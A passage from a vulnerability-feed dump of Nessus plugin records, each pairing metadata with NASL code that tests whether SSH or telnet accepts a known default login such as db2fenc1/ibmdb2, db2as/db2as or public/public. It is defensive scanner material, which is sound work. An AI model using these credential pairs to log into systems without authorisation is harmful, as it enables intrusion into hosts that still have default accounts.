"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:08:05", "description": "The account 'db2fenc1' has the password 'ibmdb2'. An attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-10-01T00:00:00", "type": "nessus", "title": "Default Password (ibmdb2) for 'db2fenc1' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2001-0051"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DB2FENC1_IBMDB2.NASL", "href": "https://www.tenable.com/plugins/nessus/11861", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Chris Foster\n#\n#\n# See the Nessus Scripts License for details\n#\n# Changes by Tenable\n# Add global_settings/supplied_logins_only script_exclude_key (06/2015)\n# Add exit() messages for more detailed audits\n#\n\naccount = \"db2fenc1\";\npassword = \"ibmdb2\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11861);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2001-0051\");\n script_bugtraq_id(2068);\n\n script_name(english:\"Default Password (ibmdb2) for 'db2fenc1' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'db2fenc1' has the password 'ibmdb2'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/10/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Chris Foster.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) exit(0, \"Nessus is currently configured to not log in with user accounts not specified in the scan policy.\");\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:08:07", "description": "The account 'db2as' has the password 'db2as'. An attacker may use it to gain further privileges on the system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-10-01T00:00:00", "type": "nessus", "title": "Default Password (db2as) for 'db2as' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-2001-0051"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_DB2AS_DB2AS.NASL", "href": "https://www.tenable.com/plugins/nessus/11864", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Chris Foster\n# \n# See the Nessus Scripts License for details\n#\n# Changes by Tenable\n# Add global_settings/supplied_logins_only script_exclude_key (06/2015)\n# Add exit() messages for more detailed audits\n#\n\n\naccount = \"db2as\";\npassword = \"db2as\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(11864);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-2001-0051\");\n script_bugtraq_id(2068);\n\n script_name(english:\"Default Password (db2as) for 'db2as' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'db2as' has the password 'db2as'. An attacker may use it\nto gain further privileges on the system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it if possible.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/10/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2003-2022 Chris Foster.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) exit(0, \"Nessus is currently configured to not log in with user accounts not specified in the scan policy.\");\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:31:30", "description": "The account 'user' on the remote host has the password 'debug'. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2005-03-08T00:00:00", "type": "nessus", "title": "Default Password (debug) for 'user' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-1999-1420"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_USER_DEBUG.NASL", "href": "https://www.tenable.com/plugins/nessus/17293", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"user\";\npassword = \"debug\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17293);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-1999-1420\");\n script_bugtraq_id(212);\n\n script_name(english:\"Default Password (debug) for 'user' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system/switch can be accessed using default credentials\nwith root level privileges.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'user' on the remote host has the password 'debug'. An\nattacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1998/Jul/183\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:31:37", "description": "The account 'public' on the remote host has the password 'public'.\nAn attacker may use this to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2005-03-08T00:00:00", "type": "nessus", "title": "Default Password (public) for 'public' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0383", "CVE-1999-0502"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_PUBLIC_PUBLIC.NASL", "href": "https://www.tenable.com/plugins/nessus/17290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"public\";\npassword = \"public\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17290);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0383\", \"CVE-1999-0502\");\n script_bugtraq_id(183);\n\n script_name(english:\"Default Password (public) for 'public' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default user account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'public' on the remote host has the password 'public'.\nAn attacker may use this to gain further privileges on this system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1999/Jan/23\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"1999/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T15:31:38", "description": "The account 'user' on the remote host has the password 'forgot'. An attacker may use it to gain further privileges on this system.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2005-03-08T00:00:00", "type": "nessus", "title": "Default Password (forgot) for 'user' Account", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-1999-0502", "CVE-1999-1420"], "modified": "2022-04-11T00:00:00", "cpe": [], "id": "ACCOUNT_USER_FORGOT.NASL", "href": "https://www.tenable.com/plugins/nessus/17294", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"user\";\npassword = \"forgot\";\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(17294);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-1999-0502\", \"CVE-1999-1420\");\n script_bugtraq_id(212);\n\n script_name(english:\"Default Password (forgot) for 'user' Account\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system/switch can be accessed using default credentials\nwith root level privileges.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'user' on the remote host has the password 'forgot'. An\nattacker may use it to gain further privileges on this system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/1998/Jul/183\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/03/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected)